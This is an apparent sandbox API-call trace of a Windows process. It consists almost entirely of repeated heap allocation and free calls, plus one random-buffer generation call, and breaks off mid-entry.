[0059.253] GetProcessHeap () returned 0x280000 [0059.253] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.253] GetProcessHeap () returned 0x280000 [0059.253] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.253] GetProcessHeap () returned 0x280000 [0059.253] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.253] GetProcessHeap () returned 0x280000 [0059.253] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.253] GetProcessHeap () returned 0x280000 [0059.253] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.253] GetProcessHeap () returned 0x280000 [0059.253] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.253] GetProcessHeap () returned 0x280000 [0059.253] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.253] GetProcessHeap () returned 0x280000 [0059.253] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.253] GetProcessHeap () returned 0x280000 [0059.253] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.253] GetProcessHeap () returned 0x280000 [0059.253] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.253] GetProcessHeap () returned 0x280000 [0059.253] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.253] GetProcessHeap () returned 0x280000 [0059.253] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.253] GetProcessHeap () returned 0x280000 [0059.253] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.253] GetProcessHeap () returned 0x280000 [0059.253] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.253] GetProcessHeap () returned 0x280000 [0059.253] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.253] GetProcessHeap () returned 0x280000 [0059.253] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.253] GetProcessHeap () returned 0x280000 [0059.253] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.253] GetProcessHeap () returned 0x280000 [0059.253] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.253] GetProcessHeap () returned 0x280000 [0059.254] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.254] GetProcessHeap () returned 0x280000 [0059.254] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.254] GetProcessHeap () returned 0x280000 [0059.254] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.254] GetProcessHeap () returned 0x280000 [0059.254] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.254] GetProcessHeap () returned 0x280000 [0059.254] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.254] GetProcessHeap () returned 0x280000 [0059.254] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.254] GetProcessHeap () returned 0x280000 [0059.254] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.254] GetProcessHeap () returned 0x280000 [0059.254] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.254] GetProcessHeap () returned 0x280000 [0059.254] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.254] GetProcessHeap () returned 0x280000 [0059.254] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.254] GetProcessHeap () returned 0x280000 [0059.254] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.254] GetProcessHeap () returned 0x280000 [0059.254] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.254] GetProcessHeap () returned 0x280000 [0059.254] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.254] GetProcessHeap () returned 0x280000 [0059.254] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.254] GetProcessHeap () returned 0x280000 [0059.254] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.254] GetProcessHeap () returned 0x280000 [0059.254] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.254] GetProcessHeap () returned 0x280000 [0059.254] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.254] GetProcessHeap () returned 0x280000 [0059.254] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.254] GetProcessHeap () returned 0x280000 [0059.254] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.255] GetProcessHeap () returned 0x280000 [0059.255] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.255] GetProcessHeap () returned 0x280000 [0059.255] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.255] GetProcessHeap () returned 0x280000 [0059.255] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.255] GetProcessHeap () returned 0x280000 [0059.255] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.255] GetProcessHeap () returned 0x280000 [0059.255] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.255] GetProcessHeap () returned 0x280000 [0059.255] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.255] GetProcessHeap () returned 0x280000 [0059.255] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.255] GetProcessHeap () returned 0x280000 [0059.255] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.255] GetProcessHeap () returned 0x280000 [0059.255] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.255] GetProcessHeap () returned 0x280000 [0059.255] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.255] GetProcessHeap () returned 0x280000 [0059.255] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.255] GetProcessHeap () returned 0x280000 [0059.255] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.255] GetProcessHeap () returned 0x280000 [0059.255] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.255] GetProcessHeap () returned 0x280000 [0059.255] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.255] GetProcessHeap () returned 0x280000 [0059.255] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.255] GetProcessHeap () returned 0x280000 [0059.255] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.255] GetProcessHeap () returned 0x280000 [0059.255] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.255] GetProcessHeap () returned 0x280000 [0059.255] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.255] GetProcessHeap () returned 0x280000 [0059.256] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.256] GetProcessHeap () returned 0x280000 [0059.256] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.256] GetProcessHeap () returned 0x280000 [0059.256] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.256] GetProcessHeap () returned 0x280000 [0059.256] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.256] GetProcessHeap () returned 0x280000 [0059.256] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.256] GetProcessHeap () returned 0x280000 [0059.256] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.256] GetProcessHeap () returned 0x280000 [0059.256] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.256] GetProcessHeap () returned 0x280000 [0059.256] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.256] GetProcessHeap () returned 0x280000 [0059.256] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.256] GetProcessHeap () returned 0x280000 [0059.256] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.256] GetProcessHeap () returned 0x280000 [0059.256] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.256] GetProcessHeap () returned 0x280000 [0059.256] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.256] GetProcessHeap () returned 0x280000 [0059.256] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.342] GetProcessHeap () returned 0x280000 [0059.342] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.358] GetProcessHeap () returned 0x280000 [0059.358] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0059.379] GetProcessHeap () returned 0x280000 [0059.379] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.830] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x3772d8, Size=0x80) returned 0x2e17a0 [0059.830] GetProcessHeap () returned 0x280000 [0059.830] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1b90 | out: hHeap=0x280000) returned 1 [0059.830] GetProcessHeap () returned 0x280000 [0059.830] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47b98 | out: hHeap=0x280000) returned 1 [0059.830] GetProcessHeap () returned 0x280000 [0059.830] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f3f20 | out: hHeap=0x280000) returned 1 [0059.830] GetProcessHeap () returned 0x280000 [0059.830] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47b98 [0059.830] GetProcessHeap () returned 0x280000 [0059.830] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47b98, Size=0x80) returned 0x2e1828 [0059.830] GetProcessHeap () returned 0x280000 [0059.831] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.831] GetProcessHeap () returned 0x280000 [0059.831] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.831] GetProcessHeap () returned 0x280000 [0059.831] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2bfe50 | out: hHeap=0x280000) returned 1 [0059.831] SystemFunction036 (in: RandomBuffer=0x17e780, RandomBufferLength=0x80 | out: RandomBuffer=0x17e780) returned 1 [0059.831] GetProcessHeap () returned 0x280000 [0059.831] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x2bfe50 [0059.831] GetProcessHeap () returned 0x280000 [0059.831] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47b98 [0059.831] GetProcessHeap () returned 0x280000 [0059.831] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x102) returned 0x2f1b90 [0059.831] GetProcessHeap () returned 0x280000 [0059.831] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1068) returned 0x7d53f30 [0059.831] GetProcessHeap () returned 0x280000 [0059.831] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.831] GetProcessHeap () returned 0x280000 [0059.831] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.831] GetProcessHeap () returned 0x280000 [0059.831] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.831] GetProcessHeap () returned 0x280000 [0059.831] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.831] GetProcessHeap () returned 0x280000 [0059.831] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.831] GetProcessHeap () returned 0x280000 [0059.831] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.831] GetProcessHeap () returned 0x280000 [0059.831] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.831] GetProcessHeap () returned 0x280000 [0059.831] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.831] GetProcessHeap () returned 0x280000 [0059.831] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.831] GetProcessHeap () returned 0x280000 [0059.831] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.831] GetProcessHeap () returned 0x280000 [0059.831] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.831] GetProcessHeap () returned 0x280000 [0059.832] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.832] GetProcessHeap () returned 0x280000 [0059.832] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.832] GetProcessHeap () returned 0x280000 [0059.832] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.832] GetProcessHeap () returned 0x280000 [0059.832] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.832] GetProcessHeap () returned 0x280000 [0059.832] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.832] GetProcessHeap () returned 0x280000 [0059.832] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.832] GetProcessHeap () returned 0x280000 [0059.832] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.832] GetProcessHeap () returned 0x280000 [0059.832] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.832] GetProcessHeap () returned 0x280000 [0059.832] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.832] GetProcessHeap () returned 0x280000 [0059.832] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.832] GetProcessHeap () returned 0x280000 [0059.832] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.832] GetProcessHeap () returned 0x280000 [0059.832] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.832] GetProcessHeap () returned 0x280000 [0059.832] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.832] GetProcessHeap () returned 0x280000 [0059.832] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.832] GetProcessHeap () returned 0x280000 [0059.832] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.832] GetProcessHeap () returned 0x280000 [0059.832] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.832] GetProcessHeap () returned 0x280000 [0059.832] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.832] GetProcessHeap () returned 0x280000 [0059.832] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.832] GetProcessHeap () returned 0x280000 [0059.832] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.833] GetProcessHeap () returned 0x280000 [0059.833] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.833] GetProcessHeap () returned 0x280000 [0059.833] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.833] GetProcessHeap () returned 0x280000 [0059.833] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.833] GetProcessHeap () returned 0x280000 [0059.833] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.833] GetProcessHeap () returned 0x280000 [0059.833] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.833] GetProcessHeap () returned 0x280000 [0059.833] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.833] GetProcessHeap () returned 0x280000 [0059.833] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.833] GetProcessHeap () returned 0x280000 [0059.833] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.833] GetProcessHeap () returned 0x280000 [0059.833] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.833] GetProcessHeap () returned 0x280000 [0059.833] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.833] GetProcessHeap () returned 0x280000 [0059.833] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.833] GetProcessHeap () returned 0x280000 [0059.833] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.833] GetProcessHeap () returned 0x280000 [0059.833] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.833] GetProcessHeap () returned 0x280000 [0059.833] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.833] GetProcessHeap () returned 0x280000 [0059.833] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.833] GetProcessHeap () returned 0x280000 [0059.833] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.833] GetProcessHeap () returned 0x280000 [0059.833] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.833] GetProcessHeap () returned 0x280000 [0059.833] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.834] GetProcessHeap () returned 0x280000 [0059.834] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.834] GetProcessHeap () returned 0x280000 [0059.834] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.834] GetProcessHeap () returned 0x280000 [0059.834] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.834] GetProcessHeap () returned 0x280000 [0059.834] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.834] GetProcessHeap () returned 0x280000 [0059.834] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.834] GetProcessHeap () returned 0x280000 [0059.834] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.834] GetProcessHeap () returned 0x280000 [0059.834] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.834] GetProcessHeap () returned 0x280000 [0059.834] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.834] GetProcessHeap () returned 0x280000 [0059.834] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.834] GetProcessHeap () returned 0x280000 [0059.834] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.834] GetProcessHeap () returned 0x280000 [0059.834] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.834] GetProcessHeap () returned 0x280000 [0059.834] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.834] GetProcessHeap () returned 0x280000 [0059.834] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.834] GetProcessHeap () returned 0x280000 [0059.834] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.834] GetProcessHeap () returned 0x280000 [0059.834] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.834] GetProcessHeap () returned 0x280000 [0059.834] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.834] GetProcessHeap () returned 0x280000 [0059.834] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.834] GetProcessHeap () returned 0x280000 [0059.834] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.834] GetProcessHeap () returned 0x280000 [0059.834] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.834] GetProcessHeap () returned 0x280000 [0059.834] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.834] GetProcessHeap () returned 0x280000 [0059.835] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.835] GetProcessHeap () returned 0x280000 [0059.835] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.835] GetProcessHeap () returned 0x280000 [0059.835] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.835] GetProcessHeap () returned 0x280000 [0059.835] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.835] GetProcessHeap () returned 0x280000 [0059.835] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.835] GetProcessHeap () returned 0x280000 [0059.835] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.835] GetProcessHeap () returned 0x280000 [0059.835] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.835] GetProcessHeap () returned 0x280000 [0059.835] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.835] GetProcessHeap () returned 0x280000 [0059.835] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.835] GetProcessHeap () returned 0x280000 [0059.835] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.835] GetProcessHeap () returned 0x280000 [0059.835] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.835] GetProcessHeap () returned 0x280000 [0059.835] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.835] GetProcessHeap () returned 0x280000 [0059.835] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.835] GetProcessHeap () returned 0x280000 [0059.835] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.835] GetProcessHeap () returned 0x280000 [0059.835] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.835] GetProcessHeap () returned 0x280000 [0059.835] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.835] GetProcessHeap () returned 0x280000 [0059.835] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.835] GetProcessHeap () returned 0x280000 [0059.835] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.835] GetProcessHeap () returned 0x280000 [0059.835] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.835] GetProcessHeap () returned 0x280000 [0059.835] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.835] GetProcessHeap () returned 0x280000 [0059.835] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.835] GetProcessHeap () returned 0x280000 [0059.836] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.836] GetProcessHeap () returned 0x280000 [0059.836] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.836] GetProcessHeap () returned 0x280000 [0059.836] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.836] GetProcessHeap () returned 0x280000 [0059.836] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.836] GetProcessHeap () returned 0x280000 [0059.836] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.836] GetProcessHeap () returned 0x280000 [0059.836] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.836] GetProcessHeap () returned 0x280000 [0059.836] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: 